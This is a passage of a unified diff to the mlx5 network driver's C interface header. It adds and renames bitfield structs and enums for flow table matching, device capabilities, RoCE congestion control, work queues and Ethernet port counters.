frag[0x1]; + u8 reserved_1[0x4]; + u8 tcp_flags[0x9]; + + u8 tcp_sport[0x10]; + u8 tcp_dport[0x10]; + + u8 reserved_2[0x20]; + + u8 udp_sport[0x10]; + u8 udp_dport[0x10]; + + u8 src_ip[4][0x20]; + + u8 dst_ip[4][0x20]; +}; + +struct mlx5_ifc_fte_match_set_misc_bits { + u8 reserved_0[0x20]; + + u8 reserved_1[0x10]; + u8 source_port[0x10]; + + u8 outer_second_prio[0x3]; + u8 outer_second_cfi[0x1]; + u8 outer_second_vid[0xc]; + u8 inner_second_prio[0x3]; + u8 inner_second_cfi[0x1]; + u8 inner_second_vid[0xc]; + + u8 outer_second_vlan_tag[0x1]; + u8 inner_second_vlan_tag[0x1]; + u8 reserved_2[0xe]; + u8 gre_protocol[0x10]; + + u8 gre_key_h[0x18]; + u8 gre_key_l[0x8]; + + u8 vxlan_vni[0x18]; + u8 reserved_3[0x8]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0xc]; + u8 outer_ipv6_flow_label[0x14]; + + u8 reserved_6[0xc]; + u8 inner_ipv6_flow_label[0x14]; + + u8 reserved_7[0xe0]; +}; + +struct mlx5_ifc_cmd_pas_bits { + u8 pa_h[0x20]; + + u8 pa_l[0x14]; + u8 reserved_0[0xc]; +}; + +struct mlx5_ifc_uint64_bits { + u8 hi[0x20]; + + u8 lo[0x20]; +}; + +enum { + MLX5_ADS_STAT_RATE_NO_LIMIT = 0x0, + MLX5_ADS_STAT_RATE_2_5GBPS = 0x7, + MLX5_ADS_STAT_RATE_10GBPS = 0x8, + MLX5_ADS_STAT_RATE_30GBPS = 0x9, + MLX5_ADS_STAT_RATE_5GBPS = 0xa, + MLX5_ADS_STAT_RATE_20GBPS = 0xb, + MLX5_ADS_STAT_RATE_40GBPS = 0xc, + MLX5_ADS_STAT_RATE_60GBPS = 0xd, + MLX5_ADS_STAT_RATE_80GBPS = 0xe, + MLX5_ADS_STAT_RATE_120GBPS = 0xf, +}; + +struct mlx5_ifc_ads_bits { + u8 fl[0x1]; + u8 free_ar[0x1]; + u8 reserved_0[0xe]; + u8 pkey_index[0x10]; + + u8 reserved_1[0x8]; + u8 grh[0x1]; + u8 mlid[0x7]; + u8 rlid[0x10]; + + u8 ack_timeout[0x5]; + u8 reserved_2[0x3]; + u8 src_addr_index[0x8]; + u8 reserved_3[0x4]; + u8 stat_rate[0x4]; + u8 hop_limit[0x8]; + + u8 reserved_4[0x4]; + u8 tclass[0x8]; + u8 flow_label[0x14]; + + u8 rgid_rip[16][0x8]; + + u8 reserved_5[0x4]; + u8 f_dscp[0x1]; + u8 f_ecn[0x1]; + u8 reserved_6[0x1]; + u8 f_eth_prio[0x1]; + u8 ecn[0x2]; + u8 dscp[0x6]; + u8 udp_sport[0x10]; + + u8 dei_cfi[0x1]; + u8 eth_prio[0x3]; + u8 sl[0x4]; + u8 port[0x8]; + u8 rmac_47_32[0x10]; + + u8 rmac_31_0[0x20]; +}; + +struct mlx5_ifc_flow_table_nic_cap_bits { + u8 reserved_0[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_receive; + + u8 reserved_1[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_receive_sniffer; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_transmit; + + u8 reserved_2[0x200]; + + struct mlx5_ifc_flow_table_prop_layout_bits flow_table_properties_nic_transmit_sniffer; + + u8 reserved_3[0x7200]; +}; + +struct mlx5_ifc_per_protocol_networking_offload_caps_bits { + u8 csum_cap[0x1]; + u8 vlan_cap[0x1]; + u8 lro_cap[0x1]; + u8 lro_psh_flag[0x1]; + u8 lro_time_stamp[0x1]; + u8 reserved_0[0x6]; + u8 max_lso_cap[0x5]; + u8 reserved_1[0x4]; + u8 rss_ind_tbl_cap[0x4]; + u8 reserved_2[0x3]; + u8 tunnel_lso_const_out_ip_id[0x1]; + u8 reserved_3[0x2]; + u8 tunnel_statless_gre[0x1]; + u8 tunnel_stateless_vxlan[0x1]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x10]; + u8 lro_min_mss_size[0x10]; + + u8 reserved_6[0x120]; + + u8 lro_timer_supported_periods[4][0x20]; + + u8 reserved_7[0x600]; +}; + +struct mlx5_ifc_roce_cap_bits { + u8 roce_apm[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x60]; + + u8 reserved_2[0xc]; + u8 l3_type[0x4]; + u8 reserved_3[0x8]; + u8 roce_version[0x8]; + + u8 reserved_4[0x10]; + u8 r_roce_dest_udp_port[0x10]; + + u8 r_roce_max_src_udp_port[0x10]; + u8 r_roce_min_src_udp_port[0x10]; + + u8 reserved_5[0x10]; + u8 roce_address_table_size[0x10]; + + u8 reserved_6[0x700]; +}; + +enum { + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_1_BYTE = 0x0, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_2_BYTES = 0x2, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_4_BYTES = 0x4, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_8_BYTES = 0x8, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_16_BYTES = 0x10, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_32_BYTES = 0x20, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_64_BYTES = 0x40, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_128_BYTES = 0x80, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_QP_256_BYTES = 0x100, +}; + +enum { + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_1_BYTE = 0x1, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_2_BYTES = 0x2, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_4_BYTES = 0x4, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_8_BYTES = 0x8, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_16_BYTES = 0x10, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_32_BYTES = 0x20, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_64_BYTES = 0x40, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_128_BYTES = 0x80, + MLX5_ATOMIC_CAPS_ATOMIC_SIZE_DC_256_BYTES = 0x100, +}; + +struct mlx5_ifc_atomic_caps_bits { + u8 reserved_0[0x40]; + + u8 atomic_req_endianness[0x1]; + u8 reserved_1[0x1f]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 atomic_operations[0x10]; + + u8 reserved_4[0x10]; + u8 atomic_size_qp[0x10]; + + u8 reserved_5[0x10]; + u8 atomic_size_dc[0x10]; + + u8 reserved_6[0x720]; +}; + +struct mlx5_ifc_odp_cap_bits { + u8 reserved_0[0x40]; + + u8 sig[0x1]; + u8 reserved_1[0x1f]; + + u8 reserved_2[0x20]; + + struct mlx5_ifc_odp_per_transport_service_cap_bits rc_odp_caps; + + struct mlx5_ifc_odp_per_transport_service_cap_bits uc_odp_caps; + + struct mlx5_ifc_odp_per_transport_service_cap_bits ud_odp_caps; + + u8 reserved_3[0x720]; +}; + +enum { + MLX5_WQ_TYPE_LINKED_LIST = 0x0, + MLX5_WQ_TYPE_CYCLIC = 0x1, + MLX5_WQ_TYPE_STRQ = 0x2, +}; + +enum { + MLX5_WQ_END_PAD_MODE_NONE = 0x0, + MLX5_WQ_END_PAD_MODE_ALIGN = 0x1, +}; + +enum { + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_8_GID_ENTRIES = 0x0, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_16_GID_ENTRIES = 0x1, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_32_GID_ENTRIES = 0x2, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_64_GID_ENTRIES = 0x3, + MLX5_CMD_HCA_CAP_GID_TABLE_SIZE_128_GID_ENTRIES = 0x4, +}; + +enum { + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_128_ENTRIES = 0x0, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_256_ENTRIES = 0x1, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_512_ENTRIES = 0x2, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_1K_ENTRIES = 0x3, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_2K_ENTRIES = 0x4, + MLX5_CMD_HCA_CAP_PKEY_TABLE_SIZE_4K_ENTRIES = 0x5, +}; + +enum { + MLX5_CMD_HCA_CAP_PORT_TYPE_IB = 0x0, + MLX5_CMD_HCA_CAP_PORT_TYPE_ETHERNET = 0x1, +}; + +enum { + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_DISABLED = 0x0, + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_INITIAL_STATE = 0x1, + MLX5_CMD_HCA_CAP_CMDIF_CHECKSUM_ENABLED = 0x3, +}; + +enum { + MLX5_CAP_PORT_TYPE_IB = 0x0, + MLX5_CAP_PORT_TYPE_ETH = 0x1, }; struct mlx5_ifc_cmd_hca_cap_bits { @@ -148,9 +611,8 @@ struct mlx5_ifc_cmd_hca_cap_bits { u8 reserved_1[0xb]; u8 log_max_qp[0x5]; - u8 log_max_strq_sz[0x8]; - u8 reserved_2[0x3]; - u8 log_max_srqs[0x5]; + u8 reserved_2[0xb]; + u8 log_max_srq[0x5]; u8 reserved_3[0x10]; u8 reserved_4[0x8]; @@ -185,165 +647,6123 @@ struct mlx5_ifc_cmd_hca_cap_bits { u8 pad_cap[0x1]; u8 cc_query_allowed[0x1]; u8 cc_modify_allowed[0x1]; - u8 reserved_15[0x1d]; + u8 reserved_15[0xd]; + u8 gid_table_size[0x10]; - u8 reserved_16[0x6]; + u8 out_of_seq_cnt[0x1]; + u8 vport_counters[0x1]; + u8 reserved_16[0x4]; u8 max_qp_cnt[0xa]; u8 pkey_table_size[0x10]; - u8 eswitch_owner[0x1]; - u8 reserved_17[0xa]; + u8 vport_group_manager[0x1]; + u8 vhca_group_manager[0x1]; + u8 ib_virt[0x1]; + u8 eth_virt[0x1]; + u8 reserved_17[0x1]; + u8 ets[0x1]; + u8 nic_flow_table[0x1]; + u8 reserved_18[0x4]; u8 local_ca_ack_delay[0x5]; - u8 reserved_18[0x8]; + u8 reserved_19[0x6]; + u8 port_type[0x2]; u8 num_ports[0x8]; - u8 reserved_19[0x3]; + u8 reserved_20[0x3]; u8 log_max_msg[0x5]; - u8 reserved_20[0x18]; + u8 reserved_21[0x18]; u8 stat_rate_support[0x10]; - u8 reserved_21[0x10]; + u8 reserved_22[0xc]; + u8 cqe_version[0x4]; - u8 reserved_22[0x10]; + u8 compact_address_vector[0x1]; + u8 reserved_23[0xe]; + u8 drain_sigerr[0x1]; u8 cmdif_checksum[0x2]; u8 sigerr_cqe[0x1]; - u8 reserved_23[0x1]; + u8 reserved_24[0x1]; u8 wq_signature[0x1]; u8 sctr_data_cqe[0x1]; - u8 reserved_24[0x1]; + u8 reserved_25[0x1]; u8 sho[0x1]; u8 tph[0x1]; u8 rf[0x1]; - u8 dc[0x1]; - u8 reserved_25[0x2]; + u8 dct[0x1]; + u8 reserved_26[0x1]; + u8 eth_net_offloads[0x1]; u8 roce[0x1]; u8 atomic[0x1]; - u8 rsz_srq[0x1]; + u8 reserved_27[0x1]; u8 cq_oi[0x1]; u8 cq_resize[0x1]; u8 cq_moderation[0x1]; - u8 sniffer_rule_flow[0x1]; - u8 sniffer_rule_vport[0x1]; - u8 sniffer_rule_phy[0x1]; - u8 reserved_26[0x1]; + u8 reserved_28[0x3]; + u8 cq_eq_remap[0x1]; u8 pg[0x1]; u8 block_lb_mc[0x1]; - u8 reserved_27[0x3]; + u8 reserved_29[0x1]; + u8 scqe_break_moderation[0x1]; + u8 reserved_30[0x1]; u8 cd[0x1]; - u8 reserved_28[0x1]; + u8 reserved_31[0x1]; u8 apm[0x1]; - u8 reserved_29[0x7]; + u8 reserved_32[0x7]; u8 qkv[0x1]; u8 pkv[0x1]; - u8 reserved_30[0x4]; + u8 reserved_33[0x4]; u8 xrc[0x1]; u8 ud[0x1]; u8 uc[0x1]; u8 rc[0x1]; - u8 reserved_31[0xa]; + u8 reserved_34[0xa]; u8 uar_sz[0x6]; - u8 reserved_32[0x8]; + u8 reserved_35[0x8]; u8 log_pg_sz[0x8]; u8 bf[0x1]; - u8 reserved_33[0xa]; + u8 reserved_36[0x1]; + u8 pad_tx_eth_packet[0x1]; + u8 reserved_37[0x8]; u8 log_bf_reg_size[0x5]; - u8 reserved_34[0x10]; + u8 reserved_38[0x10]; - u8 reserved_35[0x10]; + u8 reserved_39[0x10]; u8 max_wqe_sz_sq[0x10]; - u8 reserved_36[0x10]; + u8 reserved_40[0x10]; u8 max_wqe_sz_rq[0x10]; - u8 reserved_37[0x10]; + u8 reserved_41[0x10]; u8 max_wqe_sz_sq_dc[0x10]; - u8 reserved_38[0x7]; + u8 reserved_42[0x7]; u8 max_qp_mcg[0x19]; - u8 reserved_39[0x18]; + u8 reserved_43[0x18]; u8 log_max_mcg[0x8]; - u8 reserved_40[0xb]; + u8 reserved_44[0x3]; + u8 log_max_transport_domain[0x5]; + u8 reserved_45[0x3]; u8 log_max_pd[0x5]; - u8 reserved_41[0xb]; + u8 reserved_46[0xb]; u8 log_max_xrcd[0x5]; - u8 reserved_42[0x20]; + u8 reserved_47[0x20]; - u8 reserved_43[0x3]; + u8 reserved_48[0x3]; u8 log_max_rq[0x5]; - u8 reserved_44[0x3]; + u8 reserved_49[0x3]; u8 log_max_sq[0x5]; - u8 reserved_45[0x3]; + u8 reserved_50[0x3]; u8 log_max_tir[0x5]; - u8 reserved_46[0x3]; + u8 reserved_51[0x3]; u8 log_max_tis[0x5]; - u8 reserved_47[0x13]; - u8 log_max_rq_per_tir[0x5]; - u8 reserved_48[0x3]; + u8 basic_cyclic_rcv_wqe[0x1]; + u8 reserved_52[0x2]; + u8 log_max_rmp[0x5]; + u8 reserved_53[0x3]; + u8 log_max_rqt[0x5]; + u8 reserved_54[0x3]; + u8 log_max_rqt_size[0x5]; + u8 reserved_55[0x3]; u8 log_max_tis_per_sq[0x5]; - u8 reserved_49[0xe0]; + u8 reserved_56[0x3]; + u8 log_max_stride_sz_rq[0x5]; + u8 reserved_57[0x3]; + u8 log_min_stride_sz_rq[0x5]; + u8 reserved_58[0x3]; + u8 log_max_stride_sz_sq[0x5]; + u8 reserved_59[0x3]; + u8 log_min_stride_sz_sq[0x5]; + + u8 reserved_60[0x1b]; + u8 log_max_wq_sz[0x5]; + + u8 reserved_61[0xa0]; - u8 reserved_50[0x10]; + u8 reserved_62[0x3]; + u8 log_max_l2_table[0x5]; + u8 reserved_63[0x8]; u8 log_uar_page_sz[0x10]; - u8 reserved_51[0x100]; + u8 reserved_64[0x100]; - u8 reserved_52[0x1f]; + u8 reserved_65[0x1f]; u8 cqe_zip[0x1]; u8 cqe_zip_timeout[0x10]; u8 cqe_zip_max_num[0x10]; - u8 reserved_53[0x220]; + u8 reserved_66[0x220]; }; -struct mlx5_ifc_set_hca_cap_in_bits { - u8 opcode[0x10]; - u8 reserved_0[0x10]; +enum { + MLX5_DEST_FORMAT_STRUCT_DESTINATION_TYPE_FLOW_TABLE_ = 0x1, + MLX5_DEST_FORMAT_STRUCT_DESTINATION_TYPE_TIR = 0x2, +}; - u8 reserved_1[0x10]; - u8 op_mod[0x10]; +struct mlx5_ifc_dest_format_struct_bits { + u8 destination_type[0x8]; + u8 destination_id[0x18]; - u8 reserved_2[0x40]; + u8 reserved_0[0x20]; +}; + +struct mlx5_ifc_fte_match_param_bits { + struct mlx5_ifc_fte_match_set_lyr_2_4_bits outer_headers; + + struct mlx5_ifc_fte_match_set_misc_bits misc_parameters; + + struct mlx5_ifc_fte_match_set_lyr_2_4_bits inner_headers; - struct mlx5_ifc_cmd_hca_cap_bits hca_capability_struct; + u8 reserved_0[0xa00]; }; -struct mlx5_ifc_query_hca_cap_in_bits { - u8 opcode[0x10]; - u8 reserved_0[0x10]; +enum { + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_SRC_IP = 0x0, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_DST_IP = 0x1, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_L4_SPORT = 0x2, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_L4_DPORT = 0x3, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_IPSEC_SPI = 0x4, +}; - u8 reserved_1[0x10]; - u8 op_mod[0x10]; +struct mlx5_ifc_rx_hash_field_select_bits { + u8 l3_prot_type[0x1]; + u8 l4_prot_type[0x1]; + u8 selected_fields[0x1e]; +}; - u8 reserved_2[0x40]; +enum { + MLX5_WQ_WQ_TYPE_WQ_LINKED_LIST = 0x0, + MLX5_WQ_WQ_TYPE_WQ_CYCLIC = 0x1, }; -struct mlx5_ifc_query_hca_cap_out_bits { - u8 status[0x8]; +enum { + MLX5_WQ_END_PADDING_MODE_END_PAD_NONE = 0x0, + MLX5_WQ_END_PADDING_MODE_END_PAD_ALIGN = 0x1, +}; + +struct mlx5_ifc_wq_bits { + u8 wq_type[0x4]; + u8 wq_signature[0x1]; + u8 end_padding_mode[0x2]; + u8 cd_slave[0x1]; u8 reserved_0[0x18]; - u8 syndrome[0x20]; + u8 hds_skip_first_sge[0x1]; + u8 log2_hds_buf_size[0x3]; + u8 reserved_1[0x7]; + u8 page_offset[0x5]; + u8 lwm[0x10]; - u8 reserved_1[0x40]; + u8 reserved_2[0x8]; + u8 pd[0x18]; + + u8 reserved_3[0x8]; + u8 uar_page[0x18]; + + u8 dbr_addr[0x40]; + + u8 hw_counter[0x20]; + + u8 sw_counter[0x20]; + + u8 reserved_4[0xc]; + u8 log_wq_stride[0x4]; + u8 reserved_5[0x3]; + u8 log_wq_pg_sz[0x5]; + u8 reserved_6[0x3]; + u8 log_wq_sz[0x5]; + + u8 reserved_7[0x4e0]; - u8 capability_struct[256][0x8]; + struct mlx5_ifc_cmd_pas_bits pas[0]; }; -struct mlx5_ifc_set_hca_cap_out_bits { - u8 status[0x8]; - u8 reserved_0[0x18]; +struct mlx5_ifc_rq_num_bits { + u8 reserved_0[0x8]; + u8 rq_num[0x18]; +}; - u8 syndrome[0x20]; +struct mlx5_ifc_mac_address_layout_bits { + u8 reserved_0[0x10]; + u8 mac_addr_47_32[0x10]; - u8 reserved_1[0x40]; + u8 mac_addr_31_0[0x20]; +}; + +struct mlx5_ifc_cong_control_r_roce_ecn_np_bits { + u8 reserved_0[0xa0]; + + u8 min_time_between_cnps[0x20]; + + u8 reserved_1[0x12]; + u8 cnp_dscp[0x6]; + u8 reserved_2[0x5]; + u8 cnp_802p_prio[0x3]; + + u8 reserved_3[0x720]; +}; + +struct mlx5_ifc_cong_control_r_roce_ecn_rp_bits { + u8 reserved_0[0x60]; + + u8 reserved_1[0x4]; + u8 clamp_tgt_rate[0x1]; + u8 reserved_2[0x3]; + u8 clamp_tgt_rate_after_time_inc[0x1]; + u8 reserved_3[0x17]; + + u8 reserved_4[0x20]; + + u8 rpg_time_reset[0x20]; + + u8 rpg_byte_reset[0x20]; + + u8 rpg_threshold[0x20]; + + u8 rpg_max_rate[0x20]; + + u8 rpg_ai_rate[0x20]; + + u8 rpg_hai_rate[0x20]; + + u8 rpg_gd[0x20]; + + u8 rpg_min_dec_fac[0x20]; + + u8 rpg_min_rate[0x20]; + + u8 reserved_5[0xe0]; + + u8 rate_to_set_on_first_cnp[0x20]; + + u8 dce_tcp_g[0x20]; + + u8 dce_tcp_rtt[0x20]; + + u8 rate_reduce_monitor_period[0x20]; + + u8 reserved_6[0x20]; + + u8 initial_alpha_value[0x20]; + + u8 reserved_7[0x4a0]; +}; + +struct mlx5_ifc_cong_control_802_1qau_rp_bits { + u8 reserved_0[0x80]; + + u8 rppp_max_rps[0x20]; + + u8 rpg_time_reset[0x20]; + + u8 rpg_byte_reset[0x20]; + + u8 rpg_threshold[0x20]; + + u8 rpg_max_rate[0x20]; + + u8 rpg_ai_rate[0x20]; + + u8 rpg_hai_rate[0x20]; + + u8 rpg_gd[0x20]; + + u8 rpg_min_dec_fac[0x20]; + + u8 rpg_min_rate[0x20]; + + u8 reserved_1[0x640]; +}; + +enum { + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_LOG_CQ_SIZE = 0x1, + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_PAGE_OFFSET = 0x2, + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_LOG_PAGE_SIZE = 0x4, +}; + +struct mlx5_ifc_resize_field_select_bits { + u8 resize_field_select[0x20]; +}; + +enum { + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_CQ_PERIOD = 0x1, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_CQ_MAX_COUNT = 0x2, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_OI = 0x4, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_C_EQN = 0x8, +}; + +struct mlx5_ifc_modify_field_select_bits { + u8 modify_field_select[0x20]; +}; + +struct mlx5_ifc_field_select_r_roce_np_bits { + u8 field_select_r_roce_np[0x20]; +}; + +struct mlx5_ifc_field_select_r_roce_rp_bits { + u8 field_select_r_roce_rp[0x20]; +}; + +enum { + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPPP_MAX_RPS = 0x4, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_TIME_RESET = 0x8, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_BYTE_RESET = 0x10, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_THRESHOLD = 0x20, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MAX_RATE = 0x40, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_AI_RATE = 0x80, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_HAI_RATE = 0x100, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_GD = 0x200, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MIN_DEC_FAC = 0x400, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MIN_RATE = 0x800, +}; + +struct mlx5_ifc_field_select_802_1qau_rp_bits { + u8 field_select_8021qaurp[0x20]; +}; + +struct mlx5_ifc_phys_layer_cntrs_bits { + u8 time_since_last_clear_high[0x20]; + + u8 time_since_last_clear_low[0x20]; + + u8 symbol_errors_high[0x20]; + + u8 symbol_errors_low[0x20]; + + u8 sync_headers_errors_high[0x20]; + + u8 sync_headers_errors_low[0x20]; + + u8 edpl_bip_errors_lane0_high[0x20]; + + u8 edpl_bip_errors_lane0_low[0x20]; + + u8 edpl_bip_errors_lane1_high[0x20]; + + u8 edpl_bip_errors_lane1_low[0x20]; + + u8 edpl_bip_errors_lane2_high[0x20]; + + u8 edpl_bip_errors_lane2_low[0x20]; + + u8 edpl_bip_errors_lane3_high[0x20]; + + u8 edpl_bip_errors_lane3_low[0x20]; + + u8 fc_fec_corrected_blocks_lane0_high[0x20]; + + u8 fc_fec_corrected_blocks_lane0_low[0x20]; + + u8 fc_fec_corrected_blocks_lane1_high[0x20]; + + u8 fc_fec_corrected_blocks_lane1_low[0x20]; + + u8 fc_fec_corrected_blocks_lane2_high[0x20]; + + u8 fc_fec_corrected_blocks_lane2_low[0x20]; + + u8 fc_fec_corrected_blocks_lane3_high[0x20]; + + u8 fc_fec_corrected_blocks_lane3_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane0_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane0_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane1_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane1_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane2_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane2_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane3_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane3_low[0x20]; + + u8 rs_fec_corrected_blocks_high[0x20]; + + u8 rs_fec_corrected_blocks_low[0x20]; + + u8 rs_fec_uncorrectable_blocks_high[0x20]; + + u8 rs_fec_uncorrectable_blocks_low[0x20]; + + u8 rs_fec_no_errors_blocks_high[0x20]; + + u8 rs_fec_no_errors_blocks_low[0x20]; + + u8 rs_fec_single_error_blocks_high[0x20]; + + u8 rs_fec_single_error_blocks_low[0x20]; + + u8 rs_fec_corrected_symbols_total_high[0x20]; + + u8 rs_fec_corrected_symbols_total_low[0x20]; + + u8 rs_fec_corrected_symbols_lane0_high[0x20]; + + u8 rs_fec_corrected_symbols_lane0_low[0x20]; + + u8 rs_fec_corrected_symbols_lane1_high[0x20]; + + u8 rs_fec_corrected_symbols_lane1_low[0x20]; + + u8 rs_fec_corrected_symbols_lane2_high[0x20]; + + u8 rs_fec_corrected_symbols_lane2_low[0x20]; + + u8 rs_fec_corrected_symbols_lane3_high[0x20]; + + u8 rs_fec_corrected_symbols_lane3_low[0x20]; + + u8 link_down_events[0x20]; + + u8 successful_recovery_events[0x20]; + + u8 reserved_0[0x180]; +}; + +struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits { + u8 transmit_queue_high[0x20]; + + u8 transmit_queue_low[0x20]; + + u8 reserved_0[0x780]; +}; + +struct mlx5_ifc_eth_per_prio_grp_data_layout_bits { + u8 rx_octets_high[0x20]; + + u8 rx_octets_low[0x20]; + + u8 reserved_0[0xc0]; + + u8 rx_frames_high[0x20]; + + u8 rx_frames_low[0x20]; + + u8 tx_octets_high[0x20]; + + u8 tx_octets_low[0x20]; + + u8 reserved_1[0xc0]; + + u8 tx_frames_high[0x20]; + + u8 tx_frames_low[0x20]; + + u8 rx_pause_high[0x20]; + + u8 rx_pause_low[0x20]; + + u8 rx_pause_duration_high[0x20]; + + u8 rx_pause_duration_low[0x20]; + + u8 tx_pause_high[0x20]; + + u8 tx_pause_low[0x20]; + + u8 tx_pause_duration_high[0x20]; + + u8 tx_pause_duration_low[0x20]; + + u8 rx_pause_transition_high[0x20]; + + u8 rx_pause_transition_low[0x20]; + + u8 reserved_2[0x400]; +}; + +struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits { + u8 port_transmit_wait_high[0x20]; + + u8 port_transmit_wait_low[0x20]; + + u8 reserved_0[0x780]; +}; + +struct mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits { + u8 dot3stats_alignment_errors_high[0x20]; + + u8 dot3stats_alignment_errors_low[0x20]; + + u8 dot3stats_fcs_errors_high[0x20]; + + u8 dot3stats_fcs_errors_low[0x20]; + + u8 dot3stats_single_collision_frames_high[0x20]; + + u8 dot3stats_single_collision_frames_low[0x20]; + + u8 dot3stats_multiple_collision_frames_high[0x20]; + + u8 dot3stats_multiple_collision_frames_low[0x20]; + + u8 dot3stats_sqe_test_errors_high[0x20]; + + u8 dot3stats_sqe_test_errors_low[0x20]; + + u8 dot3stats_deferred_transmissions_high[0x20]; + + u8 dot3stats_deferred_transmissions_low[0x20]; + + u8 dot3stats_late_collisions_high[0x20]; + + u8 dot3stats_late_collisions_low[0x20]; + + u8 dot3stats_excessive_collisions_high[0x20]; + + u8 dot3stats_excessive_collisions_low[0x20]; + + u8 dot3stats_internal_mac_transmit_errors_high[0x20]; + + u8 dot3stats_internal_mac_transmit_errors_low[0x20]; + + u8 dot3stats_carrier_sense_errors_high[0x20]; + + u8 dot3stats_carrier_sense_errors_low[0x20]; + + u8 dot3stats_frame_too_longs_high[0x20]; + + u8 dot3stats_frame_too_longs_low[0x20]; + + u8 dot3stats_internal_mac_receive_errors_high[0x20]; + + u8 dot3stats_internal_mac_receive_errors_low[0x20]; + + u8 dot3stats_symbol_errors_high[0x20]; + + u8 dot3stats_symbol_errors_low[0x20]; + + u8 dot3control_in_unknown_opcodes_high[0x20]; + + u8 dot3control_in_unknown_opcodes_low[0x20]; + + u8 dot3in_pause_frames_high[0x20]; + + u8 dot3in_pause_frames_low[0x20]; + + u8 dot3out_pause_frames_high[0x20]; + + u8 dot3out_pause_frames_low[0x20]; + + u8 reserved_0[0x3c0]; +}; + +struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits { + u8 ether_stats_drop_events_high[0x20]; + + u8 ether_stats_drop_events_low[0x20]; + + u8 ether_stats_octets_high[0x20]; + + u8 ether_stats_octets_low[0x20]; + + u8 ether_stats_pkts_high[0x20]; + + u8 ether_stats_pkts_low[0x20]; + + u8 ether_stats_broadcast_pkts_high[0x20]; + + u8 ether_stats_broadcast_pkts_low[0x20]; + + u8 ether_stats_multicast_pkts_high[0x20]; + + u8 ether_stats_multicast_pkts_low[0x20]; + + u8 ether_stats_crc_align_errors_high[0x20]; + + u8 ether_stats_crc_align_errors_low[0x20]; + + u8 ether_stats_undersize_pkts_high[0x20]; + + u8 ether_stats_undersize_pkts_low[0x20]; + + u8 ether_stats_oversize_pkts_high[0x20]; + + u8 ether_stats_oversize_pkts_low[0x20]; + + u8 ether_stats_fragments_high[0x20]; + + u8 ether_stats_fragments_low[0x20]; + + u8 ether_stats_jabbers_high[0x20]; + + u8 